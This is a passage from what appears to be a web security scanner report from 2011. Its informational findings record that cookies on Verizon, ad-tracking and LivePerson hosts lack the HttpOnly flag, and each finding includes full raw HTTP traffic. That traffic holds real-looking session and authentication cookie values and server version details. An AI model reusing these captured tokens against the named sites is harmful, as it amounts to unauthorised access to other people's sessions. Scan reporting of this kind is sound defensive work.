Cookie: ACID=tX790013123977920032; C2=q62YOBbfC0zjGQQhrCQcHW0uSKsBdbdBGbAmoZgxi+iBeziBGnLuHYRxGwakAfwuRX4q0utBT7qhZB2IzaYWhahBdPiBGjpDAcHvG4EA7xrBOpKPGEIZGa8kffQucX8+5CHCqQsBwB; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; aceRTB=rm%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cam%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cdc%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Can%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Crub%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7C; GUID=MTMxNTEzOTI0MjsxOjE3Mmpta2gxN2cxMHJzOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: https://ad.yieldmanager.com/pixel?id=357067&t=2
Set-Cookie: C2=OnUZOBbfB0zjG7ZhrCQcHWgVSKsBdbdxgZAmoZMYi+iBezixglLuHYRxGbUkAfwuRXkR0udBT7qR0/1IzaE9hahBdPixgFbPIsOlGAnq8YQgkZUYT+9B5ydhWmLcIoCxGrA; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
Set-Cookie: GUID=MTMxNTI2MDg3ODsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 05 Sep 2011 23:14:38 GMT
Content-Length: 0


10.76. https://mblogin.verizonwireless.com/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mblogin.verizonwireless.com
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:31 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-11
Am_client_type: genericHTML
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close
Content-Length: 18685


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/j
...[SNIP]...

10.77. http://media.verizon.com/media/XmlProxy.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.verizon.com
Path:   /media/XmlProxy.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/XmlProxy.ashx?widget=vzMedia&callback=?&_rand=1315280536004 HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://media.verizon.com/media/widgets/sliderdev/flash/MyVerizonListSliderNoDropDown.swf?version=4&_rand=1315280536005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml
Content-Length: 73898
Date: Mon, 05 Sep 2011 22:42:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=KQfyhK9qeUc=&H=&I=&J=JxCF029RF/U=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:50 GMT; path=/media

...<?xml version="1.0" encoding="utf-8"?>
<Response creationDate="9/5/2011 6:01:02 AM">
<Results>
<Group id="VZMediaDefault" entitlement="HBO,Starz Play,Showtime,ABC Sneak Peeks,Smithsonian C
...[SNIP]...

10.78. http://media.verizon.com/media/scripts/widget.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.verizon.com
Path:   /media/scripts/widget.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/scripts/widget.ashx?widget=vzNews&container=vzNewsWidget HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 143025
Date: Mon, 05 Sep 2011 22:41:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:23 PM; valid until: 9/5/2011 5:42:21 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = false;

/* files consolidated
...[SNIP]...

10.79. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=101633&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1315139242; mt_mop=10008:1315139190|2:1315139242|5:1315061038|4:1313678521|10001:1312768945|10002:1313678517

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6809 26633
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 05 Sep 2011 22:14:39 GMT
Connection: Keep-Alive
Set-Cookie: ts=1315260879; domain=.mathtag.com; path=/; expires=Tue, 04-Sep-2012 22:14:39 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.80. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?&b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g&jsb=1&cid=&rnd=0.3133519586570117 HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Sat, 03-Mar-2012 22:14:41 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 22:14:40 GMT

GIF89a.............!.......,...........D..;

10.81. http://s.xp1.ru4.com/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=17345346&_g=17345335&_a=17344945&_p=1621613&_s=0&_pm=17344948&_pn=2&_pl=0&redirect=http://s.xp1.ru4.com/images/pixel.gif HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:19:21 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
X-Cnection: close
Pragma: no-cache
Set-cookie: X1ID=BC-00000000964218310; domain=.ru4.com; path=/; expires=Mon, 05-Mar-2013 18:19:21 GMT
Set-cookie: O15772=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Location: http://s.xp1.ru4.com/images/pixel.gif
Content-length: 0


10.82. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=15772&_t=behavioral&ssv_002=tv HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:18:40 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 997910-B997917=0|0|0|0|0|997915|997914|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 26
X-Cnection: close

var xp1_behavioral = true;

10.83. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=15772&_t=ghp&ssv_random=27&ssv_callback=SetXP1Placements&ssv_003=&ssv_004=&ssv_005=&ssv_006=&ssv_007=&ssv_008=&ssv_009=&ssv_010=&ssv_011=&ssv_012=0&ssv_013=0&ssv_014=807&ssv_015=&ssv_016= HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/
Set-cookie: P15772=; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1487
X-Cnection: close

SetXP1Placements({
"xp1_placement1": {
"creativeID": "GHP_OT_HSIDL3M_DEF",
"clickURL": "http://s.xp1.ru4.com/click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=0
...[SNIP]...

10.84. http://sales.liveperson.net/hc/2329305/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2329305/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/?&site=2329305&cmd=mTagKnockPage&lpCallId=414141118060-530569466296&protV=20&lpjson=1&id=4139350678&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb_com-sales-english-1%7ClpMTagConfig.db1%7CLP_button_div1%7C%23chat-sb_com-sales-english-2%7ClpMTagConfig.db1%7CLP_button_div2%7C%23chat-sb_com-sales-english-3%7ClpMTagConfig.db1%7CLP_button_div3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315260965504

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6796449846042111086; path=/hc/2329305
Set-Cookie: HumanClickACTIVE=1315261003173; expires=Tue, 06-Sep-2011 22:16:43 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:16:43 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 30470

lpConnLib.Process({"ResultSet": {"lpCallId":"414141118060-530569466296","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.85. http://sales.liveperson.net/hc/2329305/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2329305/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/?&site=2329305&cmd=mTagKnockPage&lpCallId=958318216958-922708770026&protV=20&lpjson=1&id=883688300&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb_com-sales-english-1%7ClpMTagConfig.db1%7CLP_button_div1%7C%23chat-sb_com-sales-english-2%7ClpMTagConfig.db1%7CLP_button_div2%7C%23chat-sb_com-sales-english-3%7ClpMTagConfig.db1%7CLP_button_div3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/overview.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:-1:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; HumanClickACTIVE=1315261015841

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315261068626; expires=Tue, 06-Sep-2011 22:17:48 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:17:48 GMT
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261068:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:17:48 GMT; path=/hc/2329305; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 30470

lpConnLib.Process({"ResultSet": {"lpCallId":"958318216958-922708770026","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.86. http://sales.liveperson.net/hc/2329305/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2329305/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/?&site=2329305&cmd=mTagStartPage&lpCallId=262428231537-506367190275&protV=20&lpjson=1&page=http%3A//www.verizonbusiness.com/Medium/&id=1569842908&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-verizon-medium-english&activePlugin=none&cobrowse=true&PV%21unit=verizon-medium&PV%21Section=Home&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21CountrySelected=xg&title=Home%20-%20Verizon%20Medium%20Business&referrer=http%3A//www22.verizon.com/content/verizonglobalhome/ghp_business.aspx&cobrowse=true&cookie=BERT%3DVRID%253d6e76b61a-0caa-4f5d-9d01-7a634d977972%7CVTID%253de8396f11-b89c-4b23-a26b-edc20acf7fae%7CSX%253d1315262200%7CVP%253d1%7CRMC%253dxg%7CLP%253den%3B%20__utma%3D58777642.1910521591.1315279004.1315279004.1315279004.1%3B%20__utmb%3D58777642.2.10.1315279004%3B%20__utmc%3D58777642%3B%20__utmz%3D58777642.1315279004.1.1.utmcsr%3Dwww22.verizon.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/content/verizonglobalhome/ghp_business.aspx HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:-1:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; HumanClickACTIVE=1315261005680

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315261011:0; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
Set-Cookie: HumanClickKEY=5729159524233474328; path=/hc/2329305
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261011:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:16:51 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"262428231537-506367190275","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.87. http://sales.liveperson.net/hc/2329305/cmd/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2329305/cmd/url/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

